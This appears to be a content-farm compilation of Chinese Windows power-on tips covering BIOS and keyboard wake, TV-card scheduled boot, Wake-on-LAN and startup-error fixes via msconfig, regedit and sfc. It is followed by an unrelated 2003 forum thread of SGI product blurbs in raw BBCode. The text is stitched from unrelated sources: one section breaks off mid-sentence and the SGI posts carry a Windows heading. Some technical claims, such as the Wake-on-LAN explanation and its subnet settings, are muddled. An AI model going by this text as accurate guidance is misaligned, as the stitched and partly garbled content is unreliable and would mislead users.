不过要提示大家一点，如果利用BIOS自动开机的话，用户的Windows操作系统中只能使用一个帐户，否则不可能实现自动开机再自动登录Windows。

篇10：Windows系统开机方法

如果电脑机箱放置在难以触及的地方，使用键盘/鼠标开机是一个不错的方案。但要注意的是此功能只支持以PS/2接口连接的键盘和鼠标，使用USB接口连接则不行。启用主板BIOS中“Power On By PS/2 Keyboard”的选项，就可以选择不同的开机热键，如Ctrl+E是最常见的开机热键。

或者选“Power Key”一项后，可用键盘上单独设计的一个电源键开机，但前提是只有部分符合Keyboard 98技术规格的键盘才支持此功能。当然，机箱上的电源按钮仍然能够使用。至于用鼠标开机也很简单，在BIOS中的设置选项与键盘开机设置类似，然后只须轻点鼠标按钮就能启动电脑.

篇11：Windows系统开机方法

具备自动开机功能的电视卡已经大量面市，将其连接好后，利用电视卡提供的软件设置开机时间即可。

电视卡的自动开机方式大致可以分为三种方式：第一种是真正具备自动开机功能的产品，需先将机箱电源线与电视卡连接再转接出;另一种是利用休眠方式开机的电视卡。其中，第二种方法由于电脑并未真正关机，即仍在消耗电力，所以并不是所有用户都乐意采用。下面主要介绍第一种自动开机方法的具体操作。

1、首先，用户在安装时要将机箱上电脑开关按钮的引线接脚与电视卡的“Power Switch”接脚相连接(笔者以康博X800电视卡为例)。

2、之后再将电视卡的另一组“Power Switch”接脚与主板上的电源接脚连接，最后把电视卡装进主板的PCI扩展槽中，这样内部连接就完成了。

3、安装好硬件后，电视卡的配套软件(如康博PVR2)也需要进行设置。主要是在“预约录像设置”功能方面，用户应勾选“启用自动开机功能”一项。

4、如果你电脑中的Windows操作系统超过一个用户使用的话，还要设为“启用自动登录”模式，并输入用户名称和密码，即可完成整个设置步骤

[Windows系统开机方法]

篇12：Windows系统开机方法

要使用Wake On LAN (WOL)网络唤醒功能，需要网卡支持，而具备WOL功能的网卡都有一条特殊的信号线连接主板上的WOL接口，负责将开机信号传送至主板。不过，目前具备WOL接口的主板已经不多，厂商改为在主板内置的网络芯片上提供WOL功能。

WOL的原理是电脑在开机时或S5休眠模式(Suspend to Disk，休眠到硬盘)下，网卡仍以极低电压维持基本运作，这时在网络上的其他电脑便可通过软件传送一个称为“Magic Packet”的神奇封包至要唤醒的电脑。网卡接收信号后就会发出开机信号至主板，使主板启动。由于电脑在唤醒前仍处于开机状态，因此我们要知道网卡的MAC地址(每张网卡均有自己独特的MAC地址，软件以此进行识别)。

网络唤醒功能的具体使用方法如下：首先在主板BIOS中打开WOL选项。注意部份主板只支持从S5模式中唤醒(Wake On LAN from S5)。

其次，从网上下载WOL软件。这个名为“Magic packet”的网络唤醒软件，其设置和使用方法都很简单。运行后在其操作界面中只有5个选项。

其中：网卡的“(MAC Address)(MAC地址)”一栏，用户可在Windows操作系统的命令行模式下输入“ipconfig/all”的指令来获得。另外，“Internet Address”(互联网地址)一栏是要进行广播的栏目，在此栏及“Subnet Mask”一栏中输入“255、255、255、255”则可进行本地广播(Local Broadcast)。第四栏为“Send Options”，应选择“Local Subnet”。第五栏“Remote Port Number”则随意输入。注意，上述设置只针对本地网络(Local LAN)而言。如要经互联网进行唤醒则涉及更多的问题，在此不作讨论。最后单击界面下方的“Wake Me UP”按钮即可实现从网络唤醒电脑。

篇13：让Windows系统摆脱加载尴尬Windows安全

当在系统中频繁安装和卸载一些应用程序，或者频繁对系统进行杀毒操作的话，系统在日后的启动过程中可能会出现相关内容无法加载的尴尬现象，当我们不小心遭遇这样的尴尬现象时，系统启动效率将会受到明显影响;为了提高系统启动效率，本文下面就将一些常见的启动加载错误总结出来，并对它们提出相应的解决办法，希望这些内容能对各位有用!

1、让系统摆脱cnsmin.dll无法加载尴尬

当系统中安装过3721软件，之后又没有正确将它从系统中卸载干净的话，那么系统在日后的启动过程中，可能会遇到cnsmin.dll加载失败的故障提示，面对这种故障提示，我们可以按照下面的操作方法来尝试让系统摆脱cnsmin.dll无法加载的尴尬：

首先依次单击系统桌面中的“开始”/“运行”命令，在弹出的系统运行对话框中，输入字符串命令“msconfig”，单击回车键后，打开系统的实用程序配置窗口;

其次单击该配置窗口中的“启动”标签，然后在对应的标签页面，检查一下该页面中的“cnsmin”项目是否处于选中状态，一旦选中的话必须及时将它取消选中，再单击“确定”按钮，最后重新启动一下计算机系统，相信这么一来系统就不会出现cnsmin.dll无法加载的尴尬了;

如果上面的方法还无法让系统摆脱cnsmin.dll无法加载尴尬的话，我们可以依次单击系统桌面的“开始”/“运行”命令，在弹出的系统运行对话框中，输入字符串命令“regedit”，单击“确定”按钮后，打开本地系统的注册表编辑窗口;

在该编辑窗口的左侧列表区域，将鼠标定位于“HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows \CurrentVersion \Run”注册表子键，然后将该子键下面的3721加载项删除掉，再刷新一下系统注册表接就可以让系统摆脱cnsmin.dll无法加载的尴尬了。

2、让系统摆脱cmicnfg.cpl 无法加载尴尬

有时候系统在启动的过程中会碰到cmicnfg.cpl加载错误的故障提示，同时系统还弹出找不到指定模块的提示，系统之所以会出现这种启动加载尴尬，多半是我们平时不按照正确顺序关闭计算机系统，或者随意使用工具程序对磁盘分区容量进行调整时造成系统文件发生丢失引起的。要想让系统摆脱cmicnfg.cpl无法加载尴尬，我们可以进行下面的尝试操作：

首先用鼠标右键单击系统桌面中的“我的电脑”图标，从弹出的快捷菜单中执行“属性”命令，打开系统的属性设置窗口，单击该窗口中的“硬件”标签，并在对应标签页面中单击“设备管理器”按钮，打开系统的设备列表窗口;

用鼠标展开该窗口中的“声音、视频和游戏控制器”项目，然后用鼠标右键单击该分支项目下面的指定声卡设备，从弹出的快捷菜单中执行“卸载”命令(如图所示)，这样一来声卡设备的驱动程序就被自动从系统中彻底卸载干净了;

紧接着将Windows系统的安装光盘放置到物理光驱中，并依次单击系统桌面中的“开始”/“运行”命令，在弹出的系统运行文本框中输入字符串命令“sfc /scannow”，单击回车键后，系统就会自动执行系统文件的修复操作;等到修复操作结束后，将Windows系统的安装光盘从物理光驱中取出来，同时重新启动一下计算机系统，之后再将声卡驱动程序重新安装一

关键字：Windows安全

篇14：SGI产品介绍Windows系统

向大家介绍[b:27cb40d2bd][color=indigo:27cb40d2bd][size=18:27cb40d2bd]工作站[/size:27cb40d2bd][/color:27cb40d2bd][/b:27cb40d2bd]系列～！ [img:27cb40d2bd]www.sgi.com.cn/Products/images/Silincon-Graphics-O2%2B-titil.jpg[/img:27cb40d2bd

向大家介绍 [b:27cb40d2bd][color=indigo:27cb40d2bd][size=18:27cb40d2bd]工作站[/size:27cb40d2bd][/color:27cb40d2bd][/b:27cb40d2bd] 系列～！

[img:27cb40d2bd]www.sgi.com.cn/Products/images/Silincon-Graphics-O2%2B-titil.jpg[/img:27cb40d2bd]

[img:27cb40d2bd]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:27cb40d2bd][img:27cb40d2bd]www.sgi.com.cn/images/dotsep420x7.gif[/img:27cb40d2bd] [img:27cb40d2bd]www.sgi.com.cn/news/upload/n1025198063-1.jpg[/img:27cb40d2bd]

[color=indigo:27cb40d2bd] 新的Silicon Graphics O2+可视化工作站具有内置视频以及强大的图像处理功能，它能在较经济的Unix系统上巧妙地集成高质量的图形性能，[/color:27cb40d2bd]

特性1：

MIPS RIA TM 400 MHz处理器、2 MB L2高速缓存；或PMC-SierraTM RM7000ATM 350 MHz处理器、256 KB L2高速缓存、1MB第三级高速缓存

益处：

高性能的RISC处理能力和可选择的性价比能够满足你的各种需求

特性2：

标准的32位双缓冲图形、具有纹理映射硬件支持的原装OpenGL 图形子系统、Z缓冲、反走样的点和线、模板(stencil)、雾以及色彩空间变换

益处：行业领先的3D性能和质量

[color=indigo:27cb40d2bd]统一存储体系结构(UMA) [/color:27cb40d2bd]

具有高速的处理能力，对特别大的数据集也同样适用；UMA设计可以在主存中同时容纳各种系统资源（CPU、图形、视频、图像、压缩数据和I/O）及产生的多个数据流；每一种计算资源均可以以每秒2.1 GB的带宽访问统一主存子系统，且访问权限相同

[color=indigo:27cb40d2bd]可支持高达1GB的SDRAM[/color:27cb40d2bd]

具有与大数据集交互的能力。在可用的系统内存范围内，可支持超过900 MB的驻留纹理内存

[color=indigo:27cb40d2bd]双向快速/宽带SCSI接口；64位PCI扩展插口以及其它的I/O选项[/color:27cb40d2bd]

杰出的可扩展能力和灵活性

[color=indigo:27cb40d2bd]嵌入式数字媒体功能[/color:27cb40d2bd]

可以方便地增强数字媒体内容的设计能力，方便地集成视频、音频和3D图形的Web页面

[color=indigo:27cb40d2bd]与SGI IRIX产品的二进制兼容能力[/color:27cb40d2bd]

可作为其它SGI产品的低成本开发机或作为它们的客户机

[color=indigo:27cb40d2bd]先进的数字视频选项、O2+双头显示选项可安装在机柜中的配置[/color:27cb40d2bd]

范围宽广的专业质量数字视频能力，具有经济的双监器功能，具有渲染、Web服务和成像的功能以及吞吐量

[url=www.sgi.com.cn/news/product/n1025663948-1.pdf][color=indigo:27cb40d2bd]请下载the Silicon Graphics O2+ Datasheet (PDF 650KB)[/color:27cb40d2bd][/url]

YT 回复于：-01-29 11:41:54[img:08167378e0]www.sgi.com.cn/Products/images/silicon%20750-wz.gif[/img:08167378e0]

[img:08167378e0]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:08167378e0][img:08167378e0]www.sgi.com.cn/images/dotsep420x7.gif[/img:08167378e0][img:08167378e0]www.sgi.com.cn/news/upload/n1025198271-1.jpg[/img:08167378e0]

[color=indigo:08167378e0]基于Itanium 处理器的Linux系统

以极好的价格提供出色的性能[/color:08167378e0]

Silicon Graphics 750系统以低廉的入门级的价格为技术和高性能计算市场提供最强大的计算能力，750系统是SGI基于Itanium处理器的第一款Linux平台，它拥有最新的Intel 64位体系结构，开放的Linux 软件资源以及针对SGI优化的库，为高性能Linux计算建立起一个全新的标准。

将高性能计算能力和开放软件资源相结合，为流体动力学计算、MCAE、计算化学、科学计算和可视化以及研究开发等市场提供了前所未有的能力--在新经济时代取得切实成功。

[color=indigo:08167378e0]单或双Intel Itanium处理器[/color:08167378e0]

Itanium是Intel 64位结构处理器系列的第一代，由于采用最新的直接并行指令计算(EPIC)技术，性能上有极大突破，750系统以革命性的浮点体系为基础，专门为低价、高性能标准计算而设计。

[color=indigo:08167378e0]高性能内存子系统[/color:08167378e0]

750系统的双内存卡能提供高达4.2GB/s的峰值带宽，可极大地提高应用程序吞吐性能，Itanium有64位寻址能力，可以扩展主存达16GB，确保未来最大的发展空间。

[color=indigo:08167378e0]高性能,高容量I/O子系统[/color:08167378e0]

高带宽64位PCI 槽提供了扩展能力，满足大吞吐量外设更专业的需求。

[color=indigo:08167378e0]极快的科学和数学库[/color:08167378e0]

750系统有一整套综合的最新的科学计算和数字函数库，并专门针对基于Itanium处理器的SGI Linux 系统进行了优化。SGI科学计算软件库（SCSL）遵循广泛行业标准，提供丰富的科学计算和数学函数，包括线性代数，直接解大型稀疏线性方程组、信号处理例程，支持64位整型变量，方便从已有系统中进行移植。

[color=indigo:08167378e0]预装Linux[/color:08167378e0]

750系统在工厂预装了Linux操作系统，并进行了系统兼容性测试，通电即可使用。

[color=indigo:08167378e0]入门级可视化[/color:08167378e0]

集成ATI图形卡，提供了廉价而出色的2D视算和控制台管理。

[color=indigo:08167378e0]软、硬件全方位全球一步到位的支持[/color:08167378e0]

SGI支持服务充分发挥SGI全球服务经验，提供全面的支持计划，适应各种业务，使用户的投资回报最大，SGI服务确保用户的技术投资得到相应回报。

[url=www.sgi.com.cn/news/product/n1025664254-1.pdf][color=indigo:08167378e0]请下载 Silicon Graphics 750 Datasheet (PDF 603KB)[/color:08167378e0][/url]

YT 回复于：2003-01-29 11:45:50[img:9fd5f46d47]www.sgi.com.cn/Products/images/octane2-wz.gif[/img:9fd5f46d47]

[img:9fd5f46d47]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:9fd5f46d47][img:9fd5f46d47]www.sgi.com.cn/images/dotsep420x7.gif[/img:9fd5f46d47]

[img:9fd5f46d47]www.sgi.com.cn/news/upload/n1025198558-1.JPG[/img:9fd5f46d47]

[color=indigo:9fd5f46d47]OCTANE工作站是计算大型数据集、绘制复杂的模型和图像、解决复杂的技术和创新计算问题的首选系统。 [/color:9fd5f46d47]

SGI具有VPro图形系统的Octane2可视化工作站推动了桌面工作站的技术发展水平。

配置1个或2个MIPS处理器的Octane2可以提交迅速完成一个任务或同时处理多个任务的能力。

Octane2是建立在世界上最先进、64位高性能的操作系统IRIX®基础之上，它还配置了许多业界最流行的软件工具和应用软件选件。

Octane2把IRIX、数字媒体功能、全方位的互操作性、连接性和系统管理工具结合在一起，因此可以方便地集成到异构环境中去并得到最广泛的应用。

[url=www.sgi.com.cn/news/product/n1025665363-1.pdf][color=indigo:9fd5f46d47]请下载 the OCTANE2 Datasheet (PDF 1.87MB)[/color:9fd5f46d47][/url]

YT 回复于：2003-01-29 11:47:53[img:0c9daf9dc7]www.sgi.com.cn/Products/images/02wz.gif[/img:0c9daf9dc7]

[img:0c9daf9dc7]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:0c9daf9dc7][img:0c9daf9dc7]www.sgi.com.cn/images/dotsep420x7.gif[/img:0c9daf9dc7]

[img:0c9daf9dc7]www.sgi.com.cn/news/upload/n1025199336-1.JPG[/img:0c9daf9dc7]

[color=indigo:0c9daf9dc7]对于三维、多媒体及Web应用来说O2是非常理想的产品。[/color:0c9daf9dc7]

O2桌面工作站是一个集成了Web用户环境的工作站系统，O2提供出众的CPU和图形性能，并以其实惠的价格提供了突破性的视频和图形功能。O2心脏中独创的统一内存体系结构（UMA）使每种系统资源（CPU、图形、视频、图像、纹理、压缩和I/O）能够直接访问数据，使用户在进行资源分配时能够享受到史无前例的带宽和灵活性。O2的计算能力基于MIPS R5000和R10000。

标准的O2系统配备了硬件加速的32位双缓冲OpenGL图形功能，具有业界一流的3D性能和质量。其标准的捆绑还包括Web创作和服务功能、在任何环境中的互操作性、用户优化的系统界面以及制作工具等。对于三维、多媒体及Web应用来说O2是非常理想的产品。

[url=www.sgi.com.cn/news/product/n1025666070-1.pdf][color=indigo:0c9daf9dc7]请下载 Silcon Graphics O2 Datasheet (PDF 887KB)[/color:0c9daf9dc7][/url]

YT 回复于：2003-01-29 11:58:51向大家介绍 [b:fb7578137b][color=indigo:fb7578137b][size=18:fb7578137b]服务器[/size:fb7578137b][/color:fb7578137b][/b:fb7578137b] 系列～！

[img:fb7578137b]www.sgi.com.cn/Products/images/300-title.jpg[/img:fb7578137b]

[img:fb7578137b]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:fb7578137b][img:fb7578137b]www.sgi.com.cn/images/dotsep420x7.gif[/img:fb7578137b]

[img:fb7578137b]www.sgi.com/origin/300/images/origin300_rack.jpg[/img:fb7578137b] [img:fb7578137b]www.sgi.com/origin/300/images/origin300_rackmnt.jpg[/img:fb7578137b]

[color=indigo:fb7578137b]特性：[/color:fb7578137b]

紧凑、低价、高性能的服务器

为满足计算密集, 高I/O带宽及海量存储的需要而设计

共享式内存系统, MIPS处理器可以从2个扩充到32个

[color=indigo:fb7578137b]紧凑的高性能模块化系统[/color:fb7578137b]

SGI Origin 300服务器采用创新的, 模块化的SGI NUMAflex体系结构, 以低廉的价格, 紧凑的结构为用户提供最优的性能。独立的计算、I/O带宽及柜内存储的扩展能力，可以让您优化配置一台充分满足您性能要求的系统。小的外形和高度模块化的设计使得SGI O300服务器在高性能计算、媒体流和复杂的数据管理方面成为理想之选。

作为SGI Origin系列服务器家族中的最新成员，SGI O300具有无以比拟的性能价格比。在为您提供世界领先级性能的同时，最大程度地降低了您的开销。

[color=indigo:fb7578137b]可伸缩的、优化的配置[/color:fb7578137b]

作为独立的计算系统，SGI O300服务器是一个3.5英寸厚、可以装在机柜中的系统，内部可装配2个或4个MIPS处理器，同时提供高性能的SGI IRIX 操作系统，内存可以扩展到4GB。对于计算密集型的应用，您可以在单一的共享内存的系统下，增加另外一台SGI O300服务器，使得处理器数目达到8个，而内存达到8GB；对于高I/O带宽需求的应用，您可以增加一个PCI扩展模块，内置有12个可以热插拔的PCI插槽；当您需要稳定的高性能价格比的存储系统时，您可以在SGI O300服务器的SCSI接口上连接SGI TP900存储器模块。总的来说，利用高带宽、低延迟的NUMAlink?模块，最多可以有8台基本的SGI O300服务器连接在一起，组成一台可以扩展到32个处理器、32G内存的系统，或者是组成16个处理器、最多56个PCI扩展槽的系统。

[color=indigo:fb7578137b]高性能、低价格的存储选择[/color:fb7578137b]

SGI TP900存储系统为SGI O300服务器提供了简单的、模块化的、高性能磁盘扩展能力。TP900存储系统采用紧凑的、大吞吐量的设计思想，可在3.5英寸厚的模块中装有8个SCSI硬盘，超过1/2TB的数据存储容量。TP900磁盘模块能够很容易地连接到SGI O300服务器的内置SCSI接口上，并且当您选择了1到2路Ultra160 SCSI通道和最新的state-of-the-art SCSI磁盘时，TP900就可以做快速数据恢复与深度数据保存的优化配置。

[url=www.sgi.com.cn/news/product/n1025666734-1.pdf][color=indigo:fb7578137b]请下载the SGI Origin 300 Datasheet (PDF 407KB)

[/color:fb7578137b][/url]

YT 回复于：2003-01-29 12:03:14[img:b500b1b500]www.sgi.com.cn/Products/images/origin%203000.gif[/img:b500b1b500]

[img:b500b1b500]www.sgi.com.cn/Products/images/origin%203000-2.gif[/img:b500b1b500]

[img:b500b1b500]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:b500b1b500][img:b500b1b500]www.sgi.com.cn/images/dotsep420x7.gif[/img:b500b1b500]

[img:b500b1b500]www.sgi.com/origin/3000/images/origin3000_home.jpg[/img:b500b1b500] [img:b500b1b500]www.sgi.com.cn/news/upload/n1025197849-1.jpg[/img:b500b1b500]

[color=indigo:b500b1b500]特性：[/color:b500b1b500]

・真正全方位的可伸缩性

・灵活性、可服务性和容错性的轻松结合

・成千上万个处理器的集群

・SGI Origin 3200--从2个MIPS处理器扩展到8个MIPS处理器

・SGI Origin 3400--从4个MIPS处理器扩展到32个MIPS处理器

・SGI Origin 3800--从16个MIPS 处理器扩展到512个MIPS处理器

[color=indigo:b500b1b500]随心所欲的灵活性[/color:b500b1b500]

在业界屡获殊荣的SGI Origin 服务器系列其可伸缩性和模块化首屈一指，该系列采用强劲的NUMA体系结构。SGI Origin 3000系列在灵活性、容错性和性能方面取得了惊人的突破。由于它的模块化水平进一步提高，每个系统在CPU、存储能力和I/O部件方面可以独立的扩展。全方位的灵活性允许各单位在各个方面升级、扩展、运行和重新部署系统的各个部件，以满足各种业务的要求。唯一的限制只是你的想象力。

[color=indigo:b500b1b500]根据需要搭建系统[/color:b500b1b500]

SGI™ NUMAflex™ 是体现当今服务器系统轻松结合理念的新产品，你可以积木块地搭建和重新搭建系统，以满足各方面应用的要求。为了不断创新，CPU可以不断升级。在运行时可以隔离和启用I/O接口。你可以根据需要轻松地配置计算能力，数据处理和通信能力，也可以根据新技术的出现重新部署你的系统。

[color=indigo:b500b1b500]性能、可靠性和多用途[/color:b500b1b500]

由于具有高带宽、卓越的可伸缩性有效的资源分布，新一代Origin 服务器--SGI™ Origin™ 3200、SGI™ Origin™ 3400、SGI™ Origin™ 3800--在性能上居领先地位，

该系列为连接高速的周边设备提供最高的带宽，并支持各种最新的网络协议及最先进的存储器技术--从每秒100MB的光纤通道存储器到用于存储域网络的SGI集群式文件系统[CXFS™]。为了满足当今各种应用对可靠性的要求，该系统采用ECC存储器、冗余的电源和冷却装置、热插拔磁盘、PCI以及IRIS FailSafe™软件，能提供不间断的可用性。为了与图形系统集成，SGI Origin 3000 系列服务器支持所有的高性能可视化功能。只要简单地添加图形扩展模块，就可以具有Infinite Reality3™的图形功能。

[color=indigo:b500b1b500]投资保护[/color:b500b1b500]

SGI Origin 3000系列建立在可靠的SGI NUMA体系结构和IRIX®6.5操作系统基础之上，因此你现有的应用软件可以顺利的运行，并且可以与其他的基于SGI IRIX操作系统的工作站和服务器完全兼容。你所采用的各种应用程序可以毫不费力地转移到3000系列上并且比以往运行得更好。由于各种工具和操作系统不变，因此你不用重新培训就可以使用该系列。SGI Origin 3000系列服务器可以充分保护你的投资，并保证各种开放系统软件在未来仍然可用。

[url=www.sgi.com.cn/news/product/n1025667217-1.pdf][color=indigo:b500b1b500]请下载the SGI Origin 3000 Datasheet (PDF 1.88MB)[/color:b500b1b500][/url]

YT 回复于：2003-01-29 12:09:00向大家介绍 [b:af406d9a55][color=indigo:af406d9a55][size=18:af406d9a55]可视化系统[/size:af406d9a55][/color:af406d9a55][/b:af406d9a55] 系列～！

[img:af406d9a55]www.sgi.com.cn/Products/images/F180-title.jpg[/img:af406d9a55]

[img:af406d9a55]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:af406d9a55][img:af406d9a55]www.sgi.com.cn/images/dotsep420x7.gif[/img:af406d9a55]

[img:af406d9a55]www.sgi.com.cn/news/upload/n102580-1.jpg[/img:af406d9a55]

[color=indigo:af406d9a55]特性：[/color:af406d9a55]

18英寸1.3兆象素1280x1024高分辨率显示

模拟及数字输入端口使其具有最佳的兼容性

.28mm点距的高质量图像

先进的位面内交换技术 (AIPS) 带来的高亮度和高对比度

内置的缩放机制将输入分辨率调整为整屏显示

方便的屏显菜单使对亮度、对比度、自动屏幕

调整及其它关键参数的修改变得极为简单容易

[color=indigo:af406d9a55]高性能的平板显示器[/color:af406d9a55]

当今基于高性能图形技术的应用程序要求显示设备提供精确的色彩和极高质量的文本、图形以及视频显示。SILICON GRAPHICS F180以分辨率、屏幕尺寸及平板特性的优化组合完全满足了这些要求，它在一块18.1英寸的大屏幕上为用户提供了高分辨率的业界领先的图像质量。内置的模拟VGA及数字DVI输入功能使F180可与大多数模拟、数字图卡相连接，适用于PC、Macintosh和SGI工作站等各种平台。

[color=indigo:af406d9a55]充分利用你的计算机和显卡[/color:af406d9a55]

极具通用性的新F180显示器包括VGA模拟输入和DVI－I输入连接器，允许两台计算机可以同时与之相连。选择信号输入简单到只需按一下前面板上的一个控制键。DVI－I既可接受数字信号也可接受模拟信号，这使得F180既可同时连接两路模拟输入也可同时连接一路模拟和一路数字输入。F180的这一特性使其具有良好的兼容性，并且在两台计算机同时与之相连时为用户省去一个视频选择控制器。其内置的缩放功能在输入分辨率较低时可自动把画面拉伸到18.1英寸整屏。

[color=indigo:af406d9a55]最佳的投资回报[/color:af406d9a55]

由于采用双通道输入技术、数字与模拟兼容技术以及对多种刷新频率的支持，F180可以让用户自由地升级显卡。用户可以自如地在不同系统间共享显示器，这些无疑延展了F180的价值。另外，与21英寸CRT显示器相比，F180经济的耗电量是非常令人激动的：F180只有21英寸CRT耗电量的一半，其散热功耗也大约只有其它显示器的三分之一，购买F180而不是21英寸CRT显示器的额外开销可以在不到一年内全部收回。按现今电费计算，购买F180的全部投资可在大约四年内完全收回。

[url=www.sgi.com.cn/news/product/n1025200480-1.jpg][color=indigo:af406d9a55]请下载the Silicon Graphics F180 Datasheet (PDF 687KB)[/color:af406d9a55][/url]

YT 回复于：2003-01-29 12:12:12[img:047794fbcf]www.sgi.com.cn/Products/images/onyx3000-wz.gif[/img:047794fbcf]

[img:047794fbcf]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:047794fbcf][img:047794fbcf]www.sgi.com.cn/images/dotsep420x7.gif[/img:047794fbcf]

[img:047794fbcf]www.sgi.com.cn/news/upload/n102589-1.JPG[/img:047794fbcf] [img:047794fbcf]www.sgi.com/visualization/onyx/3000/ir3/images/onyx3000ir3_index.jpg[/img:047794fbcf]

[img:047794fbcf]www.sgi.com/visualization/onyx/3000/ip/images/onyx3000ip_index_top.jpg[/img:047794fbcf]

[img:047794fbcf]www.sgi.com/visualization/onyx/3000/ip/images/onyx3000ip_index_bot.jpg[/img:047794fbcf]

[color=indigo:047794fbcf]无论在工程、培训、科学领域还是娱乐界，SGI Onyx 3000系列是迎接21世纪挑战的最佳计算平台。[/color:047794fbcf]

新的SGI Onxy 3000系列在模块化设计和计算机体系结构上有所突破，是SGI第三代clearcase/” target=“_blank” >ccNUMA产品，采用新型MIPS处理器和高性能的IRIX6.5操作系统。该系列建立在SGI NUMAflex模块专利技术基础上，可保证提供极好的灵活性和容错性，并全面保护用户的投资。

[url=www.sgi.com.cn/news/product/n1025666347-1.pdf][color=indigo:047794fbcf]请下载Onyx3000 Datasheet (PDF 1.19MB)[/color:047794fbcf][/url]

iricyan 回复于：2003-01-29 12:28:26我倒～

你不是真D要转行了吧！

YT 回复于：2003-01-29 12:38:05向大家介绍 [b:3e0515c743][color=indigo:3e0515c743][size=18:3e0515c743]存储器[/size:3e0515c743][/color:3e0515c743][/b:3e0515c743] 系列～！

[size=18:3e0515c743][color=indigo:3e0515c743][b:3e0515c743]SGI TP900 存储系统[/b:3e0515c743][/color:3e0515c743][/size:3e0515c743]

[img:3e0515c743]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:3e0515c743][img:3e0515c743]www.sgi.com.cn/images/dotsep420x7.gif[/img:3e0515c743]

[img:3e0515c743]www.sgi.com.cn/news/upload/n102525-1.jpg[/img:3e0515c743]

[color=indigo:3e0515c743]特性：[/color:3e0515c743]

o节省空间的紧凑设计

o高容量--超过1.1TB（4U高度）

o高性能Ultral60 SCSI通道

o增强的可用性

o配置方便

[color=indigo:3e0515c743]低价格、高性能的存储系统[/color:3e0515c743]

SGI TP900为SGITMOriginTM300服务器提供了方便的、模块式的、高性能的JBOD存储系统，它可以作为一立的设备或者一个硬盘扩展模块使用。TP900存储系统采用紧凑的、大吞吐量的设计思想，可在3.5英寸厚的机柜 [2U] 中装有8个SCSI硬盘，提供超过1/2TB的数据存储容量。

TP900存储系统能够很容易地作为磁盘模块连接到SGI O300服务器的内置SCSI接口上，并且当您选择了1到2路Ultra160 SCSI通道和最新的state-of-the-art SCSI10000转或15000转硬盘时，TP900就可以做快速数据恢复与深度数据保存的优化配置。

[color=indigo:3e0515c743]高扩展性和紧凑的设计[/color:3e0515c743]

由于存储能力不断增长的需求要远远大于其它计算能力需求的增长，因此TP900结构紧凑的设计可使你不仅在需要追加容量时增加存储资源，而且也有效地在企业内部部署存储系统。可选的桌面型机柜很容易放置到工作站办公区域。对更大型的配置，多个TP900存储系统可被安装在一个SGITMOriginTM3000系列的机柜里。

[color=indigo:3e0515c743]高容量[/color:3e0515c743]

可配置8个高容量的73GB SCSI硬盘，每台TP900可容纳584GB的数据。两台TP900可装在一个桌面型机架中，提供1.1TB的数据存储能力。

[color=indigo:3e0515c743]高可用性[/color:3e0515c743]

TP900通过高可靠性的部件来保证其高可用性，其中包括硬盘插槽，电缆，接口，可选的冗余电源，及可靠的风扇等。指示电源开、电源状态、制冷状态的指示灯在系统运转正常情况下都是绿的，当出现错误时变黄。

[color=indigo:3e0515c743]容易配置[/color:3e0515c743]

标准的TP900配置是一个SCSI通道与1到8个SCSI硬盘相连。作为一个选项，配置两个Ultral60 SCSI通道可增强其带宽特性，使其峰值带宽能够增加一倍。两个SCSI通道可连接到一台单一的主机或两台不同的主机服务器。

[url=www.sgi.com.cn/news/product/n1025668365-1.pdf][color=indigo:3e0515c743]请下载the SGI TP900 Datasheet (PDF 374KB)[/color:3e0515c743][/url]

YT 回复于：2003-01-29 12:43:28[img:ba277afc10]www.sgi.com.cn/Products/images/SGI%20TP9400-wz.gif[/img:ba277afc10]

[img:ba277afc10]www.sgi.com.cn/images/arrows/arrow_sm_prod.gif[/img:ba277afc10][img:ba277afc10]www.sgi.com.cn/images/dotsep420x7.gif[/img:ba277afc10]

[img:ba277afc10]www.sgi.com.cn/news/upload/n102555-1.jpg[/img:ba277afc10][img:ba277afc10]www.sgi.com/products/storage/images/9400_rack.jpg[/img:ba277afc10]

[color=indigo:ba277afc10]特性[/color:ba277afc10]

・针对不停顿访问数据的高可用性

・不中断数据服务的热伸缩技术

・无与伦比的性能

[color=indigo:ba277afc10]总体性能[/color:ba277afc10]

SGI TP9400是同类产品中吞吐量最大的RAID 存储子系统，由于将端对端光纤通道技术和最新的10000RPM转速的磁盘（每个最高达73GB）、具有多用途高速缓存的并行高性能控制器、ASIC以及先进的高速缓存管理微代码等多种技术相结合，TP9400几乎可以增强任何一个应用的吞吐能力。

[color=indigo:ba277afc10]高可用性[/color:ba277afc10]

TP9400除了通过磁盘阵列的RAID体系结构提供高效的可用性外，还对所有的活动部件提供了真正冗余，包括控制器、高速缓存、数据通道、电缆、接口、电源、风扇及后备电池，并且持续不断的部件监视以确保不停顿地访问数据。

[color=indigo:ba277afc10]动态可伸缩性[/color:ba277afc10]

现在存储的需求增长超过了任何其它计算机资源，TP9400设计的优点就是可以根据需要随时增加资源，并且在这个过程对整个存储子系统没有任何破坏, 存储子系统保持联机状态并且不中断对应用程序的数据服务。通过这种方法，对单个存储子系统可以联机增长到超过16TB。

[color=indigo:ba277afc10]杰出的连接性[/color:ba277afc10]

TP9400不仅可以专用于单个服务器，也可由许多计算平台共享。与主机可以直接通过光纤通道连接，也可以作为存储网络的一部分。TP9400在满足大多数SGI应用需求的同时，也可以连接到非SGI的异构开放式系统中。

[color=indigo:ba277afc10]最大容量[/color:ba277afc10]

TP9400可以安装在单个或两个符合行业标准的19英寸机柜中，其容量分别达8TB或16TB，而且还有冗余的控制器、通道和电源。每平方英尺的数据密度是最佳的。

[color=indigo:ba277afc10]出色的存储管理[/color:ba277afc10]

联机存储管理工具非常优秀，提供关键的功能如：驱动器格式化，RAID级别的配置，LUN定义、性能监视、高速缓存管理、事件监视、日志、通知以及资源分配。

[url=www.sgi.com.cn/news/product/n1025668145-1.pdf][color=indigo:ba277afc10]请下载 SGI TP9400 Datasheet (PDF 556KB)[/color:ba277afc10][/url]

iricyan 回复于：2003-01-30 02:08:30建议此贴加为精华～！

afsd 回复于：2003-01-30 09:37:51不错的资料

